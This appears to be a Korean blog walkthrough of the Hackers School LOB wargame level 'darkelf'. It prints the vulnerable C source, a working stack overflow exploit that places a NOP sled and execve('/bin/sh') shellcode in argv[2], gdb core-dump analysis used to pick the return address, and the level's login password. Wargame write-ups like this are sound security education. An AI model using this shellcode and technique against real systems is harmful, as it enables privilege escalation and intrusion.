반응형


해커스쿨 LOB LEVEL6 [wolfman -> darkelf] 풀이

M4ndU



해커스쿨 LOB [wolfman -> darkelf] 풀이입니다.


ID | wolfman

PW | love eyuna


으로 로그인합니다.



\xff 를 \x00으로 인식하는 오류를 피해 bash2를 사용합니다.


$ bash2


그리고


$ ls -l


를 이용해  어떤 파일과 어떤 폴더가 있는지 확인하고,


$ cat [문제이름].c


를 이용해 소스코드를 확인합시다.



login: wolfman

Password:

[wolfman@localhost wolfman]$ bash2

[wolfman@localhost wolfman]$ ls -l

total 20

-rwsr-sr-x    1 darkelf  darkelf     12655 Feb 26  2010 darkelf

-rw-r--r--    1 root     root          721 Mar 29  2010 darkelf.c

[wolfman@localhost wolfman]$ cat darkelf.c

/*

        The Lord of the BOF : The Fellowship of the BOF

        - darkelf

        - egghunter + buffer hunter + check length of argv[1]

*/


#include <stdio.h>

#include <stdlib.h>


extern char **environ;


main(int argc, char *argv[])

{

        char buffer[40];

        int i;


        if(argc < 2){

                printf("argv error\n");

                exit(0);

        }


        // egghunter

        for(i=0; environ[i]; i++)

                memset(environ[i], 0, strlen(environ[i]));


        if(argv[1][47] != '\xbf')

        {

                printf("stack is still your friend.\n");

                exit(0);

        }


        // check the length of argument

        if(strlen(argv[1]) > 48){

                printf("argument is too long!\n");

                exit(0);

        }


        strcpy(buffer, argv[1]);

        printf("%s\n", buffer);


        // buffer hunter

        memset(buffer, 0, 40);

}


이번에는 argv[1]의 길이를 제안하네요. 48바이트를 넘기면 안되네요.
하지만 argv[2]를 이용한다면 해결됩니다.

argv[1] = 'print "\x90"*44+RET'`
argv[2] = 'python -c 'print "\x90"*20+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`


[wolfman@localhost tmp]$ ./darkelf `python -c 'print "\x90"*44+"\xff\xff\xff\xbf"'` `python -c 'print "\x90"*20+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱?
Segmentation fault (core dumped)
[wolfman@localhost tmp]$ gdb -c core -q
Core was generated by `./darkelf 릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱?릱릱릱릱릱릱릱릱릱릱'.
Program terminated with signal 11, Segmentation fault.
#0  0xbfffffff in ?? ()
(gdb) x/1000x $esp
0xbffffac0:     0x00000000      0xbffffb04      0xbffffb14      0x40013868
(생략)
0xbffffc00:     0x2e003638      0x7261642f      0x666c656b      0x90909000
0xbffffc10:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc20:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc30:     0x90909090      0x90909090      0xffffff90      0x909000bf
0xbffffc40:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc50:     0xc0319090      0x2f2f6850      0x2f686873      0x896e6962
0xbffffc60:     0x895350e3      0xb0c289e1      0x0080cd0b      0x00000000
(생략)

0xbffffc40을 리턴주소로 잡으면 되겠네요.

[wolfman@localhost wolfman]$ ./darkelf  `python -c 'print "\x90"*44+"\x40\xfc\xff\xbf"'` `python -c 'print "\x90"*20+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱@??
bash$ my-pass
euid = 506
kernel crashed

성공입니다!
분명히 되야 하는데 안될땐 bash2를 다시 띄워서 하면 되더라구요.

그럼 다음 문제로 가즈아ㅏㅏㅏㅏㅏㅏㅏㅏㅏ



반응형
저작자표시 비영리 동일조건

'System Hacking > LOB Redhat' 카테고리의 다른 글

해커스쿨 LOB LEVEL8 [orge -> troll] 풀이  (0) 2018.02.11
해커스쿨 LOB LEVEL7 [darkelf-> orge] 풀이  (3) 2018.02.11
해커스쿨 LOB LEVEL5 [orc -> wolfman] 풀이  (0) 2018.02.11
해커스쿨 LOB LEVEL4 [goblin -> orc] 풀이  (0) 2018.02.11
해커스쿨 LOB LEVEL3 [cobolt -> goblin] 풀이  (0) 2018.02.10

+ Recent posts

티스토리툴바